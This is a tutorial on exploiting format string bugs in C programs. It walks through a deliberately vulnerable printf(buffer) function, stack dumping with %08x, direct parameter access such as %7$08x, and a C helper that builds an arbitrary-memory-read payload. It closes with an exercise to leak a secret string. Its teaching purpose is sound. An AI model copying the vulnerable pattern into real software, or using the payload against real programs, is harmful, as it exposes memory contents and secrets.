Format strings

We now study another classic program exploitation technique. A format string is a string containing format directives such as %d and %s in printf. These directives are interpreted and substituted with appropriate values. For example:

A call such as printf("%d\n", r) substitutes %d with the value of the integer variable r and prints the resulting string.
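As a minimal sketch of this substitution, the helper below (format_value, a name chosen here for illustration) uses snprintf, which interprets directives the same way printf does but writes the result into a buffer instead of the terminal.

```c
#include <stdio.h>

/* Hypothetical helper: expands the %d directive with the value of r.
   The message text is an assumption made for this example. */
int format_value(char *out, size_t size, int r) {
    /* Returns the number of characters the full result needs. */
    return snprintf(out, size, "The value is %d", r);
}
```

For instance, format_value(out, sizeof out, 42) leaves the string "The value is 42" in out.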

A classic mistake is to print a string s directly, without specifying a format. A string should always be printed through an explicit format, as in printf("%s", s).
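The effect of the explicit format can be sketched as follows. The helper name render_safely is an assumption, and snprintf stands in for printf so that the result can be inspected.

```c
#include <stdio.h>

/* Hypothetical helper: renders s through an explicit "%s" format.
   Any '%' characters inside s are copied verbatim, because s is
   passed as data and is never interpreted as a format string. */
int render_safely(char *out, size_t size, const char *s) {
    return snprintf(out, size, "%s", s);
}
```

With this form, an input such as "%08x.%s" comes out unchanged, directives included.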

Consider instead the following piece of code.
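A minimal sketch of code with this flaw might look like the function below. The name vulnerable_echo and the 128-byte buffer are assumptions made for illustration; only the direct printf of the buffer matters.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical sketch of the flaw: a user-controlled string is copied
   into a stack buffer and then handed to printf as the format string. */
int vulnerable_echo(const char *input) {
    char buffer[128];

    /* Bounded copy, so the format string bug is the only one left. */
    strncpy(buffer, input, sizeof buffer - 1);
    buffer[sizeof buffer - 1] = '\0';

    /* BUG: this should be printf("%s", buffer). Any directive in the
       input (such as %x or %s) is interpreted by printf. */
    return printf(buffer);
}
```

The function behaves well only as long as the input contains no directives, which is exactly what an attacker will not respect.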

Notice that the string buffer is printed directly, without the format "%s". The problem is that we can now give, as input, strings containing format directives, and these will be interpreted. We show some examples.

First, notice that the compiler raises a warning about the direct printf of a string.

What is happening exactly? The printf in the program interprets %08x as a format directive and prints, in hexadecimal and zero-padded to 8 digits, its first argument after the format string. The problem is that no such argument was passed! The printf therefore reads whatever lies where that argument would be, namely on top of the stack of the calling function, since parameters are pushed on the stack just before calling a function, as depicted below:

saved ebp (calling function)
return address (calling function)
first parameter
second parameter
….
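For comparison, this is what %08x does when the argument is actually supplied. The helper name format_word is an assumption, and snprintf is used in place of printf so that the result can be checked.

```c
#include <stdio.h>

/* Hypothetical helper: formats one word with %08x, that is, as
   lowercase hexadecimal, zero-padded to at least 8 digits. */
int format_word(char *out, size_t size, unsigned int word) {
    return snprintf(out, size, "%08x", word);
}
```

For instance, format_word(out, sizeof out, 0x2a) produces "0000002a". In the vulnerable program the directive is the same, but the word comes from whatever happens to be on the stack.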

So, if we keep adding format directives, we can print the whole stack of the calling function. Since the string we are printing is also on the stack (where buffer is), if we print enough words we will sooner or later find it. A trick to spot the string immediately is to prepend an easily recognizable pattern such as ‘AAAA’ (41414141 in hexadecimal). Let us try it.

The word 41414141 is easy to spot in the output: it is the beginning of our string.
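To see why AAAA shows up as 41414141, the sketch below reinterprets the first four bytes of a string as one 32-bit word and formats it with %08x, the way a stack dump would. The helper name first_word_hex is an assumption.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: views the first four bytes of s as a 32-bit
   word and formats it with %08x. The caller must pass at least
   four bytes. */
int first_word_hex(char *out, size_t size, const char *s) {
    uint32_t word;

    /* Copy the bytes instead of casting, to avoid alignment issues. */
    memcpy(&word, s, sizeof word);
    return snprintf(out, size, "%08x", (unsigned int)word);
}
```

The character A has ASCII code 0x41, so "AAAA" yields 41414141 on any machine. On a little-endian machine such as x86, "ABCD" would come out as 44434241, with the bytes reversed; AAAA is convenient precisely because its four bytes are identical.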

Direct access to parameters

Once we know the position on the stack (in this case it is the seventh word on the stack) we can refer directly to the corresponding parameter as follows:

The format %7$08x is like %08x but instead of printing the next parameter on the stack it prints the one specified before the dollar symbol, the seventh in this case. We can also print the same parameter more than once:
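The n$ syntax is a POSIX extension to the C printf family. A minimal sketch of it with an argument that is actually supplied is shown below; the helper name format_twice is an assumption, and %1$ is used instead of %7$ because only one argument is passed.

```c
#include <stdio.h>

/* Hypothetical helper showing the POSIX n$ syntax: %1$08x selects the
   first argument after the format string, and it may be selected more
   than once. Requires a POSIX C library such as glibc. */
int format_twice(char *out, size_t size, unsigned int word) {
    return snprintf(out, size, "%1$08x %1$08x", word);
}
```

Calling format_twice(out, sizeof out, 0x41414141) produces "41414141 41414141". In the vulnerable program, %7$08x selects the seventh word on the stack in the same way, even though no argument was ever passed.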

Printing arbitrary memory locations

Now that we know where our string is located on the stack, we can do more. The format directive %s is used to print strings: the corresponding parameter on the stack is interpreted as the address of a string, and the string it points to is printed (the pointer is dereferenced!). This allows us to print a string at an arbitrary memory location: we replace AAAA with our target address and we place a %s in the format string at the position corresponding to 41414141 in the output. The printf will then interpret our address as a pointer to a string and will print the string starting at that address.
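The construction of such an input can be sketched as follows. The helper name build_read_payload is an assumption, as is the target: a 32-bit little-endian machine such as x86, which is why the address bytes are written least significant first.

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical helper: builds "<4 address bytes>%<index>$s" in out.
   Assumes a 32-bit little-endian target and an address containing no
   zero byte, since a zero byte would end the string early.
   Returns the payload length, or -1 if out is too small. */
int build_read_payload(char *out, size_t size, uint32_t addr, unsigned int index) {
    if (size < 5) {
        return -1;
    }
    /* Least significant byte first, as the target stores it in memory. */
    for (int i = 0; i < 4; i++) {
        out[i] = (char)((addr >> (8 * i)) & 0xff);
    }
    /* "%%" emits a literal '%', then the index, then "$s". */
    int n = snprintf(out + 4, size - 4, "%%%u$s", index);
    if (n < 0 || (size_t)n >= size - 4) {
        return -1;
    }
    return 4 + n;
}
```

For a made-up address 0x0804a028 and index 7 (the position found earlier), the payload is the bytes 28 a0 04 08 followed by the text %7$s. The real address must be looked up in the target binary.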

Exercise

Consider the following program and try to print the supersecret string using the technique discussed above.

Notice that the string is NOT on the stack, thus it would never be printed by increasing the number of %x directives in the format string.

Hint: You can use objdump -D and/or gdb to find the string address.

The following video illustrates the solution (try it yourself before watching):

Further reading

If you are interested in how format string vulnerabilities can be exploited to modify data in memory you can have a look here.
